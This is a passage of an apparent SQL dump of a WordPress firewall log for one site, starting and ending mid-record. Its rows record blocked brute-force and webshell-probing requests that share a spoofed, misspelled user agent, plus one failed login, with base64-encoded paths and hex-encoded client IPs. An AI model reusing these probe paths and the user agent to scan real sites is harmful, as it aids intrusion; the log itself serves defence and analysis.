Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZvbnRzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133490,1699888582.255148,1699888582.246500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-filter-setting.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-filter-setting.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtZmlsdGVyLXNldHRpbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133491,1699888581.918283,1699888581.909600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-date-time-control.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-date-time-control.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtZGF0ZS10aW1lLWNvbnRyb2wucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133519,1699888570.699195,1699888570.688900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Category.php','http://eckankar-colorado.org/wp-includes/SimplePie/Category.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9DYXRlZ29yeS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133493,1699888581.071896,1699888581.063100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-cropped-image-control.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-cropped-image-control.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtY3JvcHBlZC1pbWFnZS1jb250cm9sLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134329,1700062301.898791,1700062301.890000,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/classic-editor/wp-login.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jbGFzc2ljLWVkaXRvci93cC1sb2dpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133553,1699888557.217091,1699888557.208500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/vars.php','http://eckankar-colorado.org/wp-includes/vars.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3ZhcnMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133552,1699888557.577291,1699888557.568700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/version.php','http://eckankar-colorado.org/wp-includes/version.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3ZlcnNpb24ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133520,1699888570.365381,1699888570.356700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Caption.php','http://eckankar-colorado.org/wp-includes/SimplePie/Caption.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9DYXB0aW9uLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134326,1700062322.768354,1700062322.759600,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/network/wp-login.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL25ldHdvcmsvd3AtbG9naW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134327,1700062313.892639,1700062313.883900,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/wp-login.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS93cC1sb2dpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134328,1700062307.770520,1700062307.761800,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/pomo/wp-login.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3BvbW8vd3AtbG9naW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133555,1699888556.306185,1699888556.297400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/update.php','http://eckankar-colorado.org/wp-includes/update.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3VwZGF0ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133361,1699888632.346958,1699888632.338000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-site-health-auto-updates.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-site-health-auto-updates.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLXNpdGUtaGVhbHRoLWF1dG8tdXBkYXRlcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133236,1699888682.550617,1699888682.541700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/cekidot/','http://eckankar-colorado.org/wp-content/plugins/cekidot/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jZWtpZG90Lw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133416,1699888612.335564,1699888612.326600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/admin.php','http://eckankar-colorado.org/wp-admin/includes/admin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2FkbWluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133407,1699888615.631352,1699888615.609500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-custom-image-header.php','http://eckankar-colorado.org/wp-admin/includes/class-custom-image-header.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLWN1c3RvbS1pbWFnZS1oZWFkZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133402,1699888617.915748,1699888617.906100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-language-pack-upgrader-skin.php','http://eckankar-colorado.org/wp-admin/includes/class-language-pack-upgrader-skin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLWxhbmd1YWdlLXBhY2stdXBncmFkZXItc2tpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133401,1699888618.248123,1699888618.238500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-language-pack-upgrader.php','http://eckankar-colorado.org/wp-admin/includes/class-language-pack-upgrader.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLWxhbmd1YWdlLXBhY2stdXBncmFkZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133362,1699888632.012084,1699888632.003100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-screen.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-screen.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLXNjcmVlbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133363,1699888631.642448,1699888631.633400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-privacy-requests-table.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-privacy-requests-table.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLXByaXZhY3ktcmVxdWVzdHMtdGFibGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133400,1699888618.582013,1699888618.572500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-pclzip.php','http://eckankar-colorado.org/wp-admin/includes/class-pclzip.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXBjbHppcC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133348,1699888636.870417,1699888636.861600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/dashboard.php','http://eckankar-colorado.org/wp-admin/includes/dashboard.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2Rhc2hib2FyZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134682,1700172209.891918,1700172209.869800,0x00000000000000000000FFFF5B5CFF14,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/random_compat/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3JhbmRvbV9jb21wYXQv\",\"category\":\"brute-force\",\"ssl\":1}'),(134681,0.000000,1700171723.953217,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134700,1700180059.948134,1700180059.938900,0x00000000000000000000FFFFB9D84602,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/core-plugin/include.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlLXBsdWdpbi9pbmNsdWRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134718,1700192230.953310,1700192230.944400,0x00000000000000000000FFFF29D8BC5C,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/user/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 